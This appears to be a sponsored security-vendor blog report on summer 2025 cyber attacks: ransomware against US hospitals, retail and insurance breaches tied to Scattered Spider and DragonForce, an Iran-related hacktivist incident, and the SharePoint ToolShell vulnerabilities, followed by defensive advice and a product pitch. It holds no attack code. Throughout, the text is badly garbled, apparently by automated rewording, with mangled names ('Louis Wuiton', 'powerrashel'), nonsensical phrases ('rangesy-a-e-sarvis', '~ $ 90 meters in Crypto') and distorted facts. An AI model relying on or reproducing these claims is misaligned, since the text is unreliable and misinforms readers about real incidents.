Cyber attack in summer 2025

Summer 2025 was not just hot; It was tireless.

Rainmware Hamred Hospitals, retail giants faced data violations, insurance firms were hit by fishing, and nation-state actors launched disintegrating campaigns.

Silently from the powerrashel loader to the zero-day Sharepoint exploits, the attackers placed the defenders on their heel.

This report breaks the highest-affected events of the season and what security teams need to do before the next wave is a hit.

Highlight the growing ransomware risk of summer healthcare

Hospitals cannot downtime, and attackers know this.

In this summer, ransomware groups targeted healthcare, exploiting both the value of patient data and urgency of care.

Interlock grows as a major threat to American healthcare

One July 22, 2025, highlighted Joint Advisor by CISA, FBI and HHS To embrace Healthcare and Public Health (HPH) is a major threat to the sector. The group is connected all around 14 Incidents alone in 2025 affect only healthcare providers with the third.

What is its use to separate the interlock “Filefix“A Powershell Launcher that hides the malicious script behind the decoy file tracts. It drives users to run the payload through the file explorer, bypassing specific safety detections.

RHYSIDA Ransomware targeted another American Healthcare Center

On July 8, 2025, Ricida The ransomware group reportedly leaked sensitive data from the Florida Hand Center, including medical images, driver’s license and insurance forms.

Clinic, which serves patients in Punta Gorda, Port Charlotte and Fort Myers, was given Seven days To respond before release.

Qilin recycle a spider playbook scattered in a wave of healthcare violations

In June 2025, Kilin Recording of 81 victims became the most active ransomware group, 52 of them in the healthcare sector,

The group exploited unexpected fortinet weaknesses (CVE-2024-21762 and CVE-2024-55591) to receive access, deploy ransomware, and exfiltrate sensitive data such as EHRS and insurance records.

To maximize the pressure, Qilin went beyond the encryption, taking advantage of the forcible recovery “Call the lawyer“Features and automatic dialogue tools to pay fast.

Picus Test and validated your safety controls against the most impressive hazards of 2025 in summer with safety verification platform – including interlock, kilin, dragonforce, scattered spider and toolshell.

Now start your 14-day free test and discover your readiness in minutes.

Test with a free test

Major brands violated in Retail Cybercrime Wave

The retail area could not escape the wave of cyber attack through 2025 in summer.

Louis Wuiton Breech third point in a quarter

On July 2, 2025, Louis Wuiton UK faced a data breech exposing customer contact information and purchase history, which is its third LVMH brand breech in three months after Dyer and LV Korea.

A few days later, on 10 July, the UK Police arrested four suspects tied to high-profile attacks on M&S, Co-op and heroes.

The group is allegedly connected Scattered spiderA domestic threats known for collaboration with ransomware operators such as social engineering and dragonforce indicated the growing effect of the Homegron Cyber Criminal on major retailers.

Dragonforce kills us retail chain bells us

Between 7 and 11 May, 2025, the Atlantic, on the other side of the northern Carolina, based retailer Belk faced a data breech.

Dragon Force Claimed, stating that it eliminates 156 GB of customer and employee data, including names, social security numbers, emails, orders hyster and HR files, which were later posted on their leaked site after ransom talks.

Dragonforce, which was first emerging at the end of 2023, works as a rangesy-a-e-sarvis cartel, listing about 136 victims by March 2025, many of which are in the US and UK retail outfits.

Scattered Spider’s strategy has shifted retail to insurance

A native English-speaking cyber criminal collective, scattered Spider (UNC3944), used identity-centric social engineering, voice phishing, MFA fatigue, help-desk model, and typoskated domain. April -May 2025,

In Middle June 2025Researchers stated that scattered Spider (UNC3944) had transferred from retail to target US insurance firms.

Aflak On June 12, 2025, unauthorized access was detected and vested; Customer and employee personal data (including SSN, including health claims) can be compromised.

Eri Insurance and Philadelphia Insurance Companies Also reported similar cyber disruption in mid -June, resulting in an operational downtime.

The infiltration corresponds to the known strategic profile of the spider, although no ransomware was deployed, and the system remained on.

State-state and geopolitical cyber activity

In this summer, not all cyber threats were about money.

Nation-state hackers and hacketists also left their mark, which use turbulent geophysical climate to launch attacks.

June 14-17, 2025: Pro-Israel hecticist group pridery Sparrow hit Iran’s bank Sapah, disrupted banking services, then destroyed ~ $ 90 meters in Crypto and sent tokens to do tokens by dissolving Nobitex and sending tokens.

June 30, 2025: US Department of Homeland Security and CISA issued an adjacent joint warning Iranian cyber vengeance Targeting significant infrastructure in America and Europe.

These incidents serve as a Stark reminder that cyber conflict is now a frontline expansion of geo -political stress, a one that can overtake the boundaries and regions.

Major weaknesses attracting public attention

Many Microsoft Sharepoint weaknesses were exploited this heat in a widespread cyber espionage campaign in this heat. Toolshell,

Cve-2025-53770 An important remote code is the execution defect that allows informal attackers to run arbitrary code on the weaker on-primeses SharePoint server. Threatening actors used it to deploy web shells, steal credentials and transfer it later through enterprise networks. Sisa adds bug for this Keev In the list July 20, 2025,

Cve-2025-49704 And Cve-2025-49706 Also added to KV 22 July After being abused in chained attacks. The pair enables authentication bypass and code injection, allowing the attackers to take advantage of the unpoured Sharepoint system, even if the first fix is applied.

The toolshell campaign targeted organizations in the US, Europe and Middle East, including government agencies, energy firms and telecom providers.

Security researchers say the attackers fixed Microsoft on Tuesday to develop a bypass used in CVE -2025-53770.

What to take from the summer forest in cyber security?

From hospitals to retail veterans and insurance providers, the weather also exposed cracks in the most firm environment.

What should the security teams do next here.

Your life like patch depends on this, as they do in important areas.

Start with Cisa kev entries and high-seriousness cves, but do not close there. Ask hard questions: Are you the kind of goals that go after the attackers?

Valid Is each cve actually exploiter in your environment.

Pay attention to the exploitation chains, not only the score. This is why the opponents are doing.

Hard identity as your new circumference.

Social engineering worked better than malware in this summer. Prevent MFA fatigue attacks, strengthen help-desk verification, and limit privileged access.

Train your humans, as they were the violation points.

The scattered spider and others did not exploit CVE; He exploited a person. Run regular simulation, update the fishing scenarios, and create high -risk roles to the real -world greed.

See for what happens after the initial access.

Danger actors such as interlock and kilin did not demolish the ransomware; They later moved, staged the data, and detected. Apply behavior monitoring to techniques, such as power sugar abuse, credential theft and secret exfIs.

Do not ignore heritage systems and ignore the infrastructure.

Do not ignore heritage systems and ignore the infrastructure. Toolshell campaign exploited Unexpected on-preparat sharepoint serverMany ongoing inappropriate or older versions.

Whether it is sharepoint, tool, or precious liga gear, which you cannot upgrade when aging, separate it, monitor what you cannot patch, and change what you have ignored.

We strongly suggest that the picus safety verification platform should be imitated to test the effectiveness of your safety controls against real -life cyber attacks.

You can also test your defense against hundreds of other malware and exploitation campaigns, such as Medusa, Ricida and Black Basta. 14-day free test of picus platform,

Sponsored and written by Picus security,

What's Hot

James Hells supported Lost Bitcoin Fortune to launch Difie tokens

Don’t cancel Netflix yet: I used these secret codes to unlock the entire catalog of the show

I saw Freakier on Friday and the most delicious entertaining love letter for the new Disney film Lindsay Lohan

Amazon lets you buy cars now used in a few clicks – how is it here

NVIDIA Patch Critical Triton Server Bugs that threatens AI model safety

This Palm -Acar’s power bank can charge many devices at once – and I am for all the price.

Microsoft’s new text editor is a VIM and Nano option

The best luxury car for buyers for the first time in 2025

Massives Datenleck in Cloud-Spichenn | CSO online

Most Popular

10,000 steps or Japanese walk? We ask experts if you should walk ahead or fast

FIFA Club World Cup Soccer: Stream Palmirus vs. Porto lives from anywhere

What do chatbott is careful about punctuation? I tested it with chat, Gemini and Cloud

Our Picks